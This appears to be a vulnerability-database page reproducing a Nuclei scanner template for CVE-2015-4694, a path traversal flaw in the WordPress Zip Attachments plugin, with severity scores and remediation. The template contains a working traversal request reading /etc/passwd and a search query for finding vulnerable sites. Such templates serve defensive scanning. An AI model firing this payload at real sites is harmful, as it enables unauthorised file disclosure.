Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-4694
HistoryOct 16, 2021 - 9:44 a.m.

WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval

2021-10-1609:44:32
ProjectDiscovery
github.com
5
cve2015
wordpress
wp-plugin
wpscan
lfi
zip_attachments_project

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

8.5

Confidence

High

EPSS

0.023

Percentile

89.7%

WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.

id: CVE-2015-4694

info:
  name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
  impact: |
    Arbitrary file retrieval
  remediation: |
    Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.
  reference:
    - https://wordpress.org/plugins/zip-attachments/#developers
    - https://wpscan.com/vulnerability/8047
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4694
    - http://www.vapid.dhs.org/advisory.php?v=126
    - https://wordpress.org/plugins/zip-attachments/changelog/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2015-4694
    cwe-id: CWE-22
    epss-score: 0.02304
    epss-percentile: 0.89683
    cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: zip_attachments_project
    product: zip_attachments
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/zip-attachments"
  tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f0496c4fd3aca32d1a2d8344ea8556de9f811cc86996acd4e61d9751af0339fd022100addd126b0e674d7b130b42aa93991ee8b4cf9f989dcf57581901e4ae8c8856cf:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

8.5

Confidence

High

EPSS

0.023

Percentile

89.7%